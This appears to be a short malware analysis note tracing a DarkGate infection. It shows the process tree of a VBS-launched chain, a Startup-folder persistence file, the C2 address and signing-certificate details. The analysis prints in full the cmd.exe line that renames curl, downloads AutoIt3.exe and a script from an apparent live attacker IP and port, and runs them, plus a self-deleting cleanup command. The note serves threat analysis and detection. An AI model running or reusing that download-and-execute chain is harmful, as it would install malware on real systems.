"C:\WINDOWS\System32\WScript.exe" "C:\zlww\gcpkql.vbs" 
  |---> "C:\Windows\System32\cmd.exe" /c mkdir c:\bfyx & cd /d c:\bfyx & copy c:\windows\system32\curl.exe bfyx.exe & bfyx -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 & bfyx -o iysnvq.au3 http://5.188.87.58:2351/msibfyxraav & Autoit3.exe iysnvq.au3
    |--->"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" --> DARKGATE MALWARE
      |---> Creates files in startup --> C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ehchfcd.lnk
      |---> Connects to C2 ---> 5.188.87[.]58 : 2351
      |---> Drops AutoIT Executable --> C:\ProgramData\bceeffh\Autoit3.exe
        
 |---> bfyx.exe  -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 --> ALSO DARKGATE MALWARE
    |---> Binary kills self with AutoIT.exe --> "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 & del /q /f c:\bfyx\* & rmdir /s /q c:\bfyx\ exit


Copy of Valid (Expired Cert) Info
Subject
Microsoft Corporation
Name
Microsoft Corporation
SN
33 00 00 03 8C 38 5D 5C 2E 74 83 CC FB 00 00 00 00 03 8C
Issuer
Microsoft Windows
Valid from
14:05 PM 05.05.2022
Valid to
14:05 PM 05.04.2023
Valid usage
Nt5 Crypto, Code Signing
Algorithm
sha256
Thumbprint
74 5A 64 E5 80 C0 0E E6 94 63 9E 92 FC 9C 8A C1 BE AC 5E 5D
Issuer
Microsoft Corporation
Name
Microsoft Corporation
SN
33 00 00 03 8C 38 5D 5C 2E 74 83 CC FB 00 00 00 00 03 8C
Issuer
Microsoft Windows Production PCA 2011
